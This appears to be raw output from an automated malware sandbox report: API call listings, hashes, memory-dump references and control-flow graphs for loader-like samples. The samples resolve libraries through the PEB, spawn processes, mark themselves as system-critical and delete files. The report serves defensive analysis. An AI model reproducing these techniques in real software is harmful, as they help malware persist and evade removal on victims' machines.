                                                                              • Opcode ID: 09654aaa3f3ad88cc5a2c051d36534ff27f7470270a57a428d9c59ae90ef9edd
                                                                              • Instruction ID: 8205a2c7aea9cdd3f16504a12d9cf8817fa37c9594c606d4c9f826e98cffac31
                                                                              • Opcode Fuzzy Hash: 09654aaa3f3ad88cc5a2c051d36534ff27f7470270a57a428d9c59ae90ef9edd
                                                                              • Instruction Fuzzy Hash: 0B41797190020DAFCF15DF94D881AAEBBF5FF58308F18419AF904A7225E335DA90CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00BD29E8: CoTaskMemAlloc.OLE32(00000000,00000040,00BD2C84,?,00000000,00000000,?), ref: 00BD2A2E
                                                                                • Part of subcall function 00BD29E8: CoTaskMemFree.OLE32(?), ref: 00BD2C39
                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000000,?), ref: 00BD2CD2
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD235A
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD236A
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2379
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD2383
                                                                                • Part of subcall function 00BD2327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00BD2CA6,?,00000000,?,00000000,00000000,?), ref: 00BD23D5
                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00BD2CBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Task$Free$Alloclstrcmpi
                                                                              • String ID: {
                                                                              • API String ID: 1538375688-366298937
                                                                              • Opcode ID: 766dadf099bdb46f94fc83426231636afc11addc98dbf087ca6bcad3e078fe2e
                                                                              • Instruction ID: 3b0df9d3a3b4a27a5a99674725b21cb380d5dd9b6bf0e404d4c2e8fb03133ac0
                                                                              • Opcode Fuzzy Hash: 766dadf099bdb46f94fc83426231636afc11addc98dbf087ca6bcad3e078fe2e
                                                                              • Instruction Fuzzy Hash: 4431A035E002E59BDF229B648C84BDEFBE5EB58311F0440E6A949A7340EBB4DDC08B94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00BD10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00BE7488), ref: 00BD10CB
                                                                                • Part of subcall function 00BD10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00BE7488), ref: 00BD10D5
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,00BD106D), ref: 00BD3FC1
                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BD106D), ref: 00BD3FD0
                                                                              Strings
                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BD3FCB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                              • API String ID: 3511171328-631824599
                                                                              • Opcode ID: 99bef037fb36da1637840489036d749015506977f06d7c3e2cfef47786c1a75d
                                                                              • Instruction ID: b1b89e72265d26b6479417c2aed6e65891967fcfd2853755a88d300b82c61059
                                                                              • Opcode Fuzzy Hash: 99bef037fb36da1637840489036d749015506977f06d7c3e2cfef47786c1a75d
                                                                              • Instruction Fuzzy Hash: D4E065747003814BD3209F39E804746B7E1AF04740F108C9EE446D7741FBB1D544CB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • lstrcmpiA.KERNEL32(?,00BE5EBC), ref: 00BD2209
                                                                              • lstrcmpiA.KERNEL32(?,00BE5EC0), ref: 00BD2220
                                                                              • lstrcmpiA.KERNEL32(?,00BE5EC4), ref: 00BD2233
                                                                              • lstrcmpiA.KERNEL32(?,00BE5EC8), ref: 00BD2243
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 1586166983-0
                                                                              • Opcode ID: 0a6e049a243615457f92d026d02f380f061f77338fcac63c7b872d6e2112ba37
                                                                              • Instruction ID: b7a1eed9b23ad638679deedd4f9d8ce57a9fc2bc41919283f36419fb5025941f
                                                                              • Opcode Fuzzy Hash: 0a6e049a243615457f92d026d02f380f061f77338fcac63c7b872d6e2112ba37
                                                                              • Instruction Fuzzy Hash: 74F082323847C3A2D631136A5CC1F3B81D89FB5B55B2044BBF645E6290F765CC412326
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:59.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:30
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 81 2e6010e 113 2e6001a GetPEB 81->113 85 2e6001a GetPEB 86 2e601a1 85->86 87 2e6001a GetPEB 86->87 88 2e601ae 87->88 89 2e6001a GetPEB 88->89 90 2e601bb 89->90 91 2e6001a GetPEB 90->91 92 2e601c8 91->92 93 2e6001a GetPEB 92->93 94 2e601d5 93->94 95 2e6001a GetPEB 94->95 96 2e601e2 95->96 97 2e6001a GetPEB 96->97 98 2e601ef 97->98 99 2e6001a GetPEB 98->99 100 2e601fc 99->100 101 2e6001a GetPEB 100->101 102 2e6020b 101->102 103 2e6001a GetPEB 102->103 104 2e60217 103->104 105 2e6001a GetPEB 104->105 106 2e60224 CreateFileA 105->106 107 2e60246 ReadFile 106->107 112 2e60273 107->112 109 2e6028b Sleep 109->112 110 2e60312 GetExitCodeProcess 110->112 111 2e603a6 112->109 112->110 112->111 114 2e60034 LoadLibraryA 113->114 114->85

                                                                              Callgraph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Opacity -> Relevance
                                                                              • Disassembly available
                                                                              callgraph 0 Function_02E60000 1 Function_02E6010E 1->0 2 Function_02E6001A 1->2

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(user32.dllntdll.dll), ref: 02E60195
                                                                              • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 02E6023C
                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 02E6026C
                                                                              • Sleep.KERNELBASE(00002EE0), ref: 02E60290
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000C.00000002.83499702341.0000000002E60000.00000040.00000400.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_12_2_2e60000_cmd.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateLibraryLoadReadSleep
                                                                              • String ID: .dll$1$2$kernel32$ntdll.dll$user32.dllntdll.dll
                                                                              • API String ID: 1602266143-1375677587
                                                                              • Opcode ID: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
                                                                              • Instruction ID: 7147bee1fde60ea81880b695f0444d704ef4dd9ad2cda8231e7813c9f8c27e00
                                                                              • Opcode Fuzzy Hash: d273159145775cbf99d807b09e3f9e0c2e71cc428fd30a0d8cec744a2f70898a
                                                                              • Instruction Fuzzy Hash: F98115B1D80218AAEB109FE0CC49FFEBBBDFF08341F148459F615EA181E7749A458B65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:13%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:43
                                                                              Total number of Limit Nodes:0
                                                                              execution_graph 12836 293aa90 12837 293aad1 FindCloseChangeNotification 12836->12837 12838 293aafe 12837->12838 12839 2931880 12840 293189d 12839->12840 12841 293191b 12840->12841 12843 2936f0a 12840->12843 12844 2936f38 12843->12844 12846 2936fa6 12843->12846 12845 2936f73 12844->12845 12844->12846 12850 293a243 12844->12850 12855 293b1d0 12845->12855 12862 293b1e0 12845->12862 12846->12841 12851 293a24e 12850->12851 12865 293a290 12851->12865 12869 293a280 12851->12869 12852 293a256 12852->12845 12856 293b259 RtlSetProcessIsCritical 12855->12856 12857 293b1df 12855->12857 12861 293b2d1 12856->12861 12880 29388a4 12857->12880 12861->12846 12863 293b1ff 12862->12863 12864 29388a4 RtlSetProcessIsCritical 12862->12864 12863->12846 12864->12863 12866 293a2a6 12865->12866 12876 293846c 12866->12876 12870 293a309 DeleteFileW 12869->12870 12871 293a28f 12869->12871 12875 293a357 12870->12875 12872 293846c DeleteFileW 12871->12872 12874 293a2ad 12872->12874 12874->12852 12875->12852 12877 293a2d8 DeleteFileW 12876->12877 12879 293a2ad 12877->12879 12879->12852 12881 293b230 RtlSetProcessIsCritical 12880->12881 12883 293b1ff 12881->12883 12883->12846 12884 29369a0 12886 29369f3 LoadLibraryA 12884->12886 12887 2936a86 12886->12887 12888 293ad00 12890 293ad68 CreateProcessW 12888->12890 12891 293af03 12890->12891 12892 293b028 12893 293b074 WaitForInputIdle 12892->12893 12895 293b0ba 12893->12895

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 97 293acf5-293ad74 99 293ad76-293ad7c 97->99 100 293ad7f-293ad86 97->100 99->100 101 293ad91-293ad98 100->101 102 293ad88-293ad8e 100->102 103 293adb7-293adbb 101->103 104 293ad9a-293adb6 101->104 102->101 105 293addb-293adeb 103->105 106 293adbd-293add3 103->106 104->103 107 293ae0a-293ae0e 105->107 108 293aded-293ae09 105->108 106->105 109 293ae10-293ae27 107->109 110 293ae2f-293ae48 107->110 108->107 109->110 111 293ae56-293ae5f 110->111 112 293ae4a-293ae53 110->112 113 293ae61-293ae78 111->113 114 293ae7a-293ae7e 111->114 112->111 113->114 115 293ae80-293ae91 114->115 116 293ae99-293aead 114->116 115->116 117 293aeb2-293af01 CreateProcessW 116->117 118 293aeaf 116->118 119 293af03-293af09 117->119 120 293af0a-293af3b 117->120 118->117 119->120 122 293af50-293af54 120->122 123 293af3d-293af41 120->123 126 293af56-293af5a 122->126 127 293af69-293af6d 122->127 123->122 125 293af43-293af46 123->125 125->122 126->127 128 293af5c-293af5f 126->128 129 293af82-293af86 127->129 130 293af6f-293af73 127->130 128->127 132 293af97 129->132 133 293af88-293af94 129->133 130->129 131 293af75-293af78 130->131 131->129 135 293af98 132->135 133->132 135->135
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,?,?,?,00000000,00000000,?), ref: 0293AEF1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: ddae6028fe147dbdc589aee351cf08a2351a3ba287264ab37c7343dfb126aaee
                                                                              • Instruction ID: 28003fa8d80d5ec77357e98c87d7fddd1144551cdbd437b18cc1ed874cef5b84
                                                                              • Opcode Fuzzy Hash: ddae6028fe147dbdc589aee351cf08a2351a3ba287264ab37c7343dfb126aaee
                                                                              • Instruction Fuzzy Hash: A1910571E002199FDB25CFAAC8847DEBBF6BF88304F25812AE455A7250DB70A985CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 136 293ad00-293ad74 138 293ad76-293ad7c 136->138 139 293ad7f-293ad86 136->139 138->139 140 293ad91-293ad98 139->140 141 293ad88-293ad8e 139->141 142 293adb7-293adbb 140->142 143 293ad9a-293adb6 140->143 141->140 144 293addb-293adeb 142->144 145 293adbd-293add3 142->145 143->142 146 293ae0a-293ae0e 144->146 147 293aded-293ae09 144->147 145->144 148 293ae10-293ae27 146->148 149 293ae2f-293ae48 146->149 147->146 148->149 150 293ae56-293ae5f 149->150 151 293ae4a-293ae53 149->151 152 293ae61-293ae78 150->152 153 293ae7a-293ae7e 150->153 151->150 152->153 154 293ae80-293ae91 153->154 155 293ae99-293aead 153->155 154->155 156 293aeb2-293af01 CreateProcessW 155->156 157 293aeaf 155->157 158 293af03-293af09 156->158 159 293af0a-293af3b 156->159 157->156 158->159 161 293af50-293af54 159->161 162 293af3d-293af41 159->162 165 293af56-293af5a 161->165 166 293af69-293af6d 161->166 162->161 164 293af43-293af46 162->164 164->161 165->166 167 293af5c-293af5f 165->167 168 293af82-293af86 166->168 169 293af6f-293af73 166->169 167->166 171 293af97 168->171 172 293af88-293af94 168->172 169->168 170 293af75-293af78 169->170 170->168 174 293af98 171->174 172->171 174->174
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,?,?,?,00000000,00000000,?), ref: 0293AEF1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: df914984eba75cd32d3711aaddb9b7c130e874230b27012ef80f6d18edcb6aee
                                                                              • Instruction ID: 36854ce704df44c6a1fbe2892a1eaf4dcd88cad7fd39d899657a281eb6ca5f2c
                                                                              • Opcode Fuzzy Hash: df914984eba75cd32d3711aaddb9b7c130e874230b27012ef80f6d18edcb6aee
                                                                              • Instruction Fuzzy Hash: 319104B1D003199FDB25CFAAC8847DEBBF6BF88304F25812AE455A7250DB70A985CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 175 2938850-2938860 177 2938862-293888e 175->177 178 293888f-293b26c 175->178 177->178 180 293b274-293b2cf RtlSetProcessIsCritical 178->180 182 293b2d1 180->182 183 293b2d6-293b2fe 180->183 182->183
                                                                              APIs
                                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0293B2C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalProcess
                                                                              • String ID:
                                                                              • API String ID: 2695349919-0
                                                                              • Opcode ID: f22dad260a448c528749091e795021ed82b53ebc73b1fc2262eb62e2cae6414e
                                                                              • Instruction ID: ea91699271119502aa2deda25d9c6fef1a663e1a0d34cd665b60fb78a10856f2
                                                                              • Opcode Fuzzy Hash: f22dad260a448c528749091e795021ed82b53ebc73b1fc2262eb62e2cae6414e
                                                                              • Instruction Fuzzy Hash: 7F4128718093988FCB02DFA9D8947EEBFF0EF4A214F09409BE484A7752C3386549DB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 187 293699f-29369ff 189 2936a01-2936a0b 187->189 190 2936a38-2936a84 LoadLibraryA 187->190 189->190 191 2936a0d-2936a0f 189->191 195 2936a86-2936a8c 190->195 196 2936a8d-2936ac6 190->196 193 2936a32-2936a35 191->193 194 2936a11-2936a1b 191->194 193->190 197 2936a1f-2936a2e 194->197 198 2936a1d 194->198 195->196 202 2936ad6 196->202 203 2936ac8-2936acc 196->203 197->197 200 2936a30 197->200 198->197 200->193 206 2936ad7 202->206 203->202 204 2936ace-2936ad1 call 2936590 203->204 204->202 206->206
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(?), ref: 02936A74
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: e8f75ab7be3f9d8a40fd62a872dc06a79bde9724302eaad82ed47f22f9379d05
                                                                              • Instruction ID: 6b31fdde71d9dfd4978a32bce841f4b6deca5ab496269a0208f2dc218d5bb74a
                                                                              • Opcode Fuzzy Hash: e8f75ab7be3f9d8a40fd62a872dc06a79bde9724302eaad82ed47f22f9379d05
                                                                              • Instruction Fuzzy Hash: C63132B0D00258AFDB11DFA9C9857DEBBF9AF48304F14812AE815E7280D774A885CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 207 29369a0-29369ff 209 2936a01-2936a0b 207->209 210 2936a38-2936a84 LoadLibraryA 207->210 209->210 211 2936a0d-2936a0f 209->211 215 2936a86-2936a8c 210->215 216 2936a8d-2936ac6 210->216 213 2936a32-2936a35 211->213 214 2936a11-2936a1b 211->214 213->210 217 2936a1f-2936a2e 214->217 218 2936a1d 214->218 215->216 222 2936ad6 216->222 223 2936ac8-2936acc 216->223 217->217 220 2936a30 217->220 218->217 220->213 226 2936ad7 222->226 223->222 224 2936ace-2936ad1 call 2936590 223->224 224->222 226->226
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(?), ref: 02936A74
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 4663e30d7566c06da5eea91fe21af0d50d69c0adce1ef843930609bc138a9e29
                                                                              • Instruction ID: 6def58ccf8486a378ad1fe130af7f211d28daff21cf3f95a3a1105a5fd06dda3
                                                                              • Opcode Fuzzy Hash: 4663e30d7566c06da5eea91fe21af0d50d69c0adce1ef843930609bc138a9e29
                                                                              • Instruction Fuzzy Hash: 763143B0D00258AFDB11DFA9C94579EBBF9EF48304F14812AE815E7380E774A885CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 227 293b1d0-293b1dd 228 293b259-293b2cf RtlSetProcessIsCritical 227->228 229 293b1df-293b1fa call 29388a4 227->229 235 293b2d1 228->235 236 293b2d6-293b2fe 228->236 232 293b1ff-293b219 229->232 235->236
                                                                              APIs
                                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0293B2C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalProcess
                                                                              • String ID:
                                                                              • API String ID: 2695349919-0
                                                                              • Opcode ID: 31a7e1875d1ea2653387d8ed594f2c474b0b2d18824443aec3fb0b857bedf3cd
                                                                              • Instruction ID: f0877467ffe2fd4c21b3a6615a34933c95bab1803e73a64704785471809a640b
                                                                              • Opcode Fuzzy Hash: 31a7e1875d1ea2653387d8ed594f2c474b0b2d18824443aec3fb0b857bedf3cd
                                                                              • Instruction Fuzzy Hash: 622166719042498FCF01CFA8C4907FEBFF0AFA5310F0942AAD851A3282C338950ADB71
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 238 293b001-293b07c 240 293b084-293b0b8 WaitForInputIdle 238->240 241 293b0c1-293b0fb 240->241 242 293b0ba-293b0c0 240->242 246 293b105 241->246 247 293b0fd 241->247 242->241 248 293b106 246->248 247->246 248->248
                                                                              APIs
                                                                              • WaitForInputIdle.USER32(00000000), ref: 0293B0A8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: IdleInputWait
                                                                              • String ID:
                                                                              • API String ID: 2200289081-0
                                                                              • Opcode ID: f550bdaedde14f11f19e9a8ebdd4b32f4e5fee744d34e3ea70892ce76ccec6c9
                                                                              • Instruction ID: 1a627c6c90bdada934aa87c21f22c3d528298497252f52386f899d899454554e
                                                                              • Opcode Fuzzy Hash: f550bdaedde14f11f19e9a8ebdd4b32f4e5fee744d34e3ea70892ce76ccec6c9
                                                                              • Instruction Fuzzy Hash: 68316F70D082999FCB16CFA9D4A47DDBFF4AF4A304F18849AE455AB352CB346909CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 249 293b229-293b26c 250 293b274-293b2cf RtlSetProcessIsCritical 249->250 251 293b2d1 250->251 252 293b2d6-293b2fe 250->252 251->252
                                                                              APIs
                                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0293B2C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalProcess
                                                                              • String ID:
                                                                              • API String ID: 2695349919-0
                                                                              • Opcode ID: f25eb7240bf96f3804c2730fa370ef6e7119516d41df26b851c52c9a6b98ede6
                                                                              • Instruction ID: 14e85a670fba9ad90fce9cb9cde3a73161186d1ed2d3b1c7ad5fe4de7187470d
                                                                              • Opcode Fuzzy Hash: f25eb7240bf96f3804c2730fa370ef6e7119516d41df26b851c52c9a6b98ede6
                                                                              • Instruction Fuzzy Hash: E72169B59012598FCB14CFAAD480BEEFBF4BF59310F14816AE455A3641C338AA48DF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 254 29388a4-293b2cf RtlSetProcessIsCritical 257 293b2d1 254->257 258 293b2d6-293b2fe 254->258 257->258
                                                                              APIs
                                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0293B2C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalProcess
                                                                              • String ID:
                                                                              • API String ID: 2695349919-0
                                                                              • Opcode ID: 607ba4f83ff7d2971aa1678cef7064aab6d425f1f5500fe6008bf32b535d1302
                                                                              • Instruction ID: 236dec7edbef1afe55c9a70ea9f190874c05f3a47d4ef77570ae6c8832e69712
                                                                              • Opcode Fuzzy Hash: 607ba4f83ff7d2971aa1678cef7064aab6d425f1f5500fe6008bf32b535d1302
                                                                              • Instruction Fuzzy Hash: 452169B19012598FCB14CF9AD480BEEFBF4AF59324F14856AE455A3640C378AA48CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 260 293b028-293b0b8 WaitForInputIdle 263 293b0c1-293b0fb 260->263 264 293b0ba-293b0c0 260->264 268 293b105 263->268 269 293b0fd 263->269 264->263 270 293b106 268->270 269->268 270->270
                                                                              APIs
                                                                              • WaitForInputIdle.USER32(00000000), ref: 0293B0A8
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: IdleInputWait
                                                                              • String ID:
                                                                              • API String ID: 2200289081-0
                                                                              • Opcode ID: 0e6ca91a47f8a4a7842b12a2f588e19c7473c997f56b6d7b649e2e9ed509f75f
                                                                              • Instruction ID: 670ad281d690ab8193af642fb1e81850319d3dfc0414c3b8f156b117d2f4fd33
                                                                              • Opcode Fuzzy Hash: 0e6ca91a47f8a4a7842b12a2f588e19c7473c997f56b6d7b649e2e9ed509f75f
                                                                              • Instruction Fuzzy Hash: FC21F0B0D002589FCB14CFAAD598BDEBBF4AF48708F14846AE419B7350CB756804CFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 271 293a280-293a28d 272 293a309-293a322 271->272 273 293a28f-293a2a8 call 293846c 271->273 277 293a324-293a327 272->277 278 293a32a-293a355 DeleteFileW 272->278 279 293a2ad-293a2c5 273->279 277->278 280 293a357-293a35d 278->280 281 293a35e-293a386 278->281 280->281
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0293A348
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.80315199708.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_15_2_2930000_wtqsCpda.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: d5e8f30ae5ff51132b4a14c57b9cd9ca9e230e30f38e82c59d3c24b0bac4e74c
                                                                              • Instruction ID: 6fb35883aa2dc6ceebb7b7c8973b6307550938666b126dd6b0407d2760aa4736
